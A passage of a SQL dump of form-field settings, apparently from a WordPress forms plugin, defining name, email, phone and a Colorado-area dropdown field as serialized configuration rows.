Name'),(1356,43,'label_pos','above','label_pos','above'),(1357,43,'mask','','mask',''),(1358,43,'datepicker','0','datepicker','0'),(1359,43,'first_name','1','first_name','1'),(1360,43,'last_name','0','last_name','0'),(1361,43,'from_name','0','from_name','0'),(1362,43,'user_info_field_group','1','user_info_field_group','1'),(1363,43,'show_help','0','show_help','0'),(1364,43,'help_text','','help_text',''),(1365,43,'calc_auto_include','0','calc_auto_include','0'),(1366,43,'calc_option','0','calc_option','0'),(1367,43,'placeholder','','placeholder',''),(1368,43,'user_address_1','','user_address_1',''),(1369,43,'user_address_2','','user_address_2',''),(1370,43,'user_city','','user_city',''),(1371,43,'user_zip','','user_zip',''),(1372,43,'user_phone','','user_phone',''),(1373,43,'user_email','','user_email',''),(1374,43,'disable_input','0','disable_input','0'),(1375,43,'input_limit','','input_limit',''),(1376,43,'input_limit_type','char','input_limit_type','char'),(1377,43,'input_limit_msg','','input_limit_msg',''),(1378,43,'user_state','0','user_state','0'),(1379,43,'autocomplete_off','0','autocomplete_off','0'),(1380,43,'num_sort','0','num_sort','0'),(1381,43,'admin_label','','admin_label',''),(1382,43,'user_info_field_group_name','','user_info_field_group_name',''),(1383,43,'user_info_field_group_custom','','user_info_field_group_custom',''),(1384,43,'show_desc','0','show_desc','0'),(1385,43,'desc_pos','none','desc_pos','none'),(1386,43,'desc_text','','desc_text',''),(1387,43,'element_class','','element_class',''),(1388,43,'required','1','required','1'),(1389,43,'key','textbox_81','key','textbox_81'),(1390,43,'default','','default',''),(1391,43,'container_class','one-half first','container_class','one-half first'),(1392,43,'manual_key','','manual_key',''),(1393,43,'custom_mask','','custom_mask',''),(1394,43,'parent_id','5','parent_id','5'),(1395,44,'objectType','Field','objectType','Field'),(1396,44,'objectDomain','fields','objectDomain','fields'),(1397,44,'editActive','','editActive',''),(1398,44,'order','3','order','3'),(1399,44,'type','lastname','type','lastname'),(1400,44,'def_id','7','def_id','7'),(1401,44,'label','Last Name','label','Last Name'),(1402,44,'label_pos','above','label_pos','above'),(1403,44,'mask','','mask',''),(1404,44,'datepicker','0','datepicker','0'),(1405,44,'first_name','0','first_name','0'),(1406,44,'from_name','0','from_name','0'),(1407,44,'user_info_field_group','1','user_info_field_group','1'),(1408,44,'show_help','0','show_help','0'),(1409,44,'help_text','','help_text',''),(1410,44,'calc_auto_include','0','calc_auto_include','0'),(1411,44,'calc_option','0','calc_option','0'),(1412,44,'placeholder','','placeholder',''),(1413,44,'user_address_1','','user_address_1',''),(1414,44,'user_address_2','','user_address_2',''),(1415,44,'user_city','','user_city',''),(1416,44,'user_zip','','user_zip',''),(1417,44,'user_phone','','user_phone',''),(1418,44,'user_email','','user_email',''),(1419,44,'disable_input','0','disable_input','0'),(1420,44,'input_limit','','input_limit',''),(1421,44,'input_limit_type','char','input_limit_type','char'),(1422,44,'input_limit_msg','','input_limit_msg',''),(1423,44,'user_state','0','user_state','0'),(1424,44,'autocomplete_off','0','autocomplete_off','0'),(1425,44,'num_sort','0','num_sort','0'),(1426,44,'admin_label','','admin_label',''),(1427,44,'user_info_field_group_name','','user_info_field_group_name',''),(1428,44,'user_info_field_group_custom','','user_info_field_group_custom',''),(1429,44,'show_desc','0','show_desc','0'),(1430,44,'desc_pos','none','desc_pos','none'),(1431,44,'desc_text','','desc_text',''),(1432,44,'element_class','','element_class',''),(1433,44,'required','1','required','1'),(1434,44,'key','lastname_82','key','lastname_82'),(1435,44,'default','','default',''),(1436,44,'container_class','one-half','container_class','one-half'),(1437,44,'parent_id','5','parent_id','5'),(1438,45,'objectType','Field','objectType','Field'),(1439,45,'objectDomain','fields','objectDomain','fields'),(1440,45,'editActive','','editActive',''),(1441,45,'order','4','order','4'),(1442,45,'type','email','type','email'),(1443,45,'def_id','14','def_id','14'),(1444,45,'label','Email','label','Email'),(1445,45,'label_pos','above','label_pos','above'),(1446,45,'mask','','mask',''),(1447,45,'datepicker','0','datepicker','0'),(1448,45,'first_name','0','first_name','0'),(1449,45,'last_name','0','last_name','0'),(1450,45,'from_name','0','from_name','0'),(1451,45,'user_address_1','0','user_address_1','0'),(1452,45,'user_address_2','0','user_address_2','0'),(1453,45,'user_city','0','user_city','0'),(1454,45,'user_zip','0','user_zip','0'),(1455,45,'user_phone','0','user_phone','0'),(1456,45,'user_info_field_group','1','user_info_field_group','1'),(1457,45,'show_help','0','show_help','0'),(1458,45,'help_text','','help_text',''),(1459,45,'calc_auto_include','0','calc_auto_include','0'),(1460,45,'calc_option','0','calc_option','0'),(1461,45,'placeholder','','placeholder',''),(1462,45,'disable_input','0','disable_input','0'),(1463,45,'input_limit','','input_limit',''),(1464,45,'input_limit_type','char','input_limit_type','char'),(1465,45,'input_limit_msg','','input_limit_msg',''),(1466,45,'user_state','0','user_state','0'),(1467,45,'autocomplete_off','0','autocomplete_off','0'),(1468,45,'num_sort','0','num_sort','0'),(1469,45,'admin_label','','admin_label',''),(1470,45,'user_info_field_group_name','','user_info_field_group_name',''),(1471,45,'user_info_field_group_custom','','user_info_field_group_custom',''),(1472,45,'show_desc','0','show_desc','0'),(1473,45,'desc_pos','none','desc_pos','none'),(1474,45,'desc_text','','desc_text',''),(1475,45,'element_class','','element_class',''),(1476,45,'required','1','required','1'),(1477,45,'key','email_83','key','email_83'),(1478,45,'default','','default',''),(1479,45,'container_class','one-half first','container_class','one-half first'),(1480,45,'parent_id','5','parent_id','5'),(1481,46,'objectType','Field','objectType','Field'),(1482,46,'objectDomain','fields','objectDomain','fields'),(1483,46,'editActive','','editActive',''),(1484,46,'order','5','order','5'),(1485,46,'type','phone','type','phone'),(1486,46,'def_id','15','def_id','15'),(1487,46,'label','Phone','label','Phone'),(1488,46,'label_pos','above','label_pos','above'),(1489,46,'mask','(999) 999-9999','mask','(999) 999-9999'),(1490,46,'datepicker','0','datepicker','0'),(1491,46,'first_name','0','first_name','0'),(1492,46,'last_name','0','last_name','0'),(1493,46,'from_name','0','from_name','0'),(1494,46,'user_address_1','0','user_address_1','0'),(1495,46,'user_address_2','0','user_address_2','0'),(1496,46,'user_city','0','user_city','0'),(1497,46,'user_zip','0','user_zip','0'),(1498,46,'user_email','0','user_email','0'),(1499,46,'user_info_field_group','1','user_info_field_group','1'),(1500,46,'show_help','0','show_help','0'),(1501,46,'help_text','','help_text',''),(1502,46,'calc_auto_include','0','calc_auto_include','0'),(1503,46,'calc_option','0','calc_option','0'),(1504,46,'placeholder','','placeholder',''),(1505,46,'disable_input','0','disable_input','0'),(1506,46,'input_limit','','input_limit',''),(1507,46,'input_limit_type','char','input_limit_type','char'),(1508,46,'input_limit_msg','','input_limit_msg',''),(1509,46,'user_state','0','user_state','0'),(1510,46,'autocomplete_off','0','autocomplete_off','0'),(1511,46,'num_sort','0','num_sort','0'),(1512,46,'admin_label','','admin_label',''),(1513,46,'user_info_field_group_name','','user_info_field_group_name',''),(1514,46,'user_info_field_group_custom','','user_info_field_group_custom',''),(1515,46,'show_desc','0','show_desc','0'),(1516,46,'desc_pos','none','desc_pos','none'),(1517,46,'desc_text','','desc_text',''),(1518,46,'element_class','','element_class',''),(1519,46,'required','1','required','1'),(1520,46,'key','phone_84','key','phone_84'),(1521,46,'default','','default',''),(1522,46,'container_class','one-half','container_class','one-half'),(1523,46,'manual_key','','manual_key',''),(1524,46,'custom_mask','','custom_mask',''),(1525,46,'parent_id','5','parent_id','5'),(1526,47,'objectType','Field','objectType','Field'),(1527,47,'objectDomain','fields','objectDomain','fields'),(1528,47,'editActive','','editActive',''),(1529,47,'order','6','order','6'),(1530,47,'type','listselect','type','listselect'),(1531,47,'label','Your Local Area','label','Your Local Area'),(1532,47,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(1533,47,'label_pos','above','label_pos','above'),(1534,47,'list_type','dropdown','list_type','dropdown'),(1535,47,'multi_size','5','multi_size','5'),(1536,47,'list_show_value','1','list_show_value','1'),(1537,47,'list','a:0:{}','list','a:0:{}'),(1538,47,'user_info_field_group','','user_info_field_group',''),(1539,47,'calc_auto_include','0','calc_auto_include','0'),(1540,47,'user_state','0','user_state','0'),(1541,47,'num_sort','0','num_sort','0'),(1542,47,'admin_label','','admin_label',''),(1543,47,'show_help','0','show_help','0'),(1544,47,'help_text','','help_text',''),(1545,47,'show_desc','0','show_desc','0'),(1546,47,'desc_pos','none','desc_pos','none'),(1547,47,'desc_text','','desc_text',''),(1548,47,'element_class','','element_class',''),(1549,47,'required','1','required','1'),(1550,47,'options','a:8:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:8:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 